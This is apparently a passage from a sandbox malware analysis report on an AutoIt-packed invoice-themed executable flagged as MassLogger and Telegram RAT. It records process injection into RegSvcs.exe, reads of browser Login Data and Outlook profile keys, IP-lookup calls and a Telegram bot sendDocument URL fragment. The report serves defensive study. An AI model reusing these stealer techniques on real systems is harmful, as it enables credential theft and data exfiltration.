Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00720C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00720C21
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00672622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00672622
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_0066083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0066083F
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006609D5 SetUnhandledExceptionFilter,	2_2_006609D5
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_00660C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00660C21

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 872008			Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9B2008			Jump to behavior

Source: C:\Users\user\Desktop\fatura098002.exe

0_2_00761201

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_00742BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00742BA5

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_0076B226 SendInput,keybd_event,

0_2_0076B226

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_007822DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_007822DA

Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\fatura098002.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe "C:\Users\user\AppData\Local\Halitherses\gehlenite.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Halitherses\gehlenite.exe"	Jump to behavior

Source: C:\Users\user\Desktop\fatura098002.exe

0_2_00760B62

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_00761663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00761663

Source: fatura098002.exe, 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmp, gehlenite.exe, 00000002.00000002.1436758952.0000000000702000.00000040.00000001.01000000.00000004.sdmp, gehlenite.exe, 00000005.00000002.1560273302.0000000000702000.00000040.00000001.01000000.00000004.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: fatura098002.exe, gehlenite.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_00720698 cpuid

0_2_00720698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_00778195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00778195

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_0075D27A GetUserNameW,

0_2_0075D27A

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_0073B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_0073B952

Source: C:\Users\user\Desktop\fatura098002.exe

Code function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_007042DE

Source: C:\Users\user\Desktop\fatura098002.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.gehlenite.exe.1b80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gehlenite.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2652141073.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gehlenite.exe PID: 7584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gehlenite.exe PID: 7840, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.gehlenite.exe.1b80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gehlenite.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gehlenite.exe PID: 7584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gehlenite.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7860, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: gehlenite.exe	Binary or memory string: WIN_81
Source: gehlenite.exe	Binary or memory string: WIN_XP
Source: gehlenite.exe, 00000005.00000002.1560273302.0000000000702000.00000040.00000001.01000000.00000004.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: gehlenite.exe	Binary or memory string: WIN_XPe
Source: gehlenite.exe	Binary or memory string: WIN_VISTA
Source: gehlenite.exe	Binary or memory string: WIN_7
Source: gehlenite.exe	Binary or memory string: WIN_8

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.gehlenite.exe.1b80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gehlenite.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2652141073.0000000000414000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2653419827.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2653936618.0000000002BA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gehlenite.exe PID: 7584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gehlenite.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7860, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.gehlenite.exe.1b80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gehlenite.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2652141073.0000000000403000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gehlenite.exe PID: 7584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7624, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gehlenite.exe PID: 7840, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.gehlenite.exe.1b80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gehlenite.exe.5a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.gehlenite.exe.1b80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.gehlenite.exe.5a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gehlenite.exe PID: 7584, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gehlenite.exe PID: 7840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7860, type: MEMORYSTR

Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00781204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	0_2_00781204
Source: C:\Users\user\Desktop\fatura098002.exe	Code function: 0_2_00781806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00781806
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	2_2_006C1204
Source: C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	Code function: 2_2_006C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_006C1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	11 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	121 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	31 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Software Packing	NTDS	127 System Information Discovery	Distributed Component Object Model	121 Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	321 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
fatura098002.exe	55%	Virustotal		Browse
fatura098002.exe	53%	ReversingLabs	Win32.Trojan.AutoitInject
fatura098002.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	53%	ReversingLabs	Win32.Trojan.AutoitInject
C:\Users\user\AppData\Local\Halitherses\gehlenite.exe	55%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189l	RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.comd	RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	gehlenite.exe, 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2652146138.0000000000413000.00000040.80000000.00040000.00000000.sdmp	false	high
http://reallyfreegeoip.orgd	RegSvcs.exe, 00000003.00000002.2653936618.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189d	RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.2653936618.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.orgd	RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2653936618.0000000002ABE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/d	RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.2653936618.0000000002AA3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot-/sendDocument?chat_id=	gehlenite.exe, 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2652146138.0000000000413000.00000040.80000000.00040000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	gehlenite.exe, 00000002.00000002.1437975448.0000000001B80000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2653936618.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, gehlenite.exe, 00000005.00000002.1560202183.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2653419827.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2652146138.0000000000413000.00000040.80000000.00040000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	reallyfreegeoip.org	European Union		13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States		16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585877
Start date and time:	2025-01-08 12:29:23 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	fatura098002.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/3@2/2
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 98% Number of executed functions: 47 Number of non-executed functions: 303
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 7624 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 7860 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
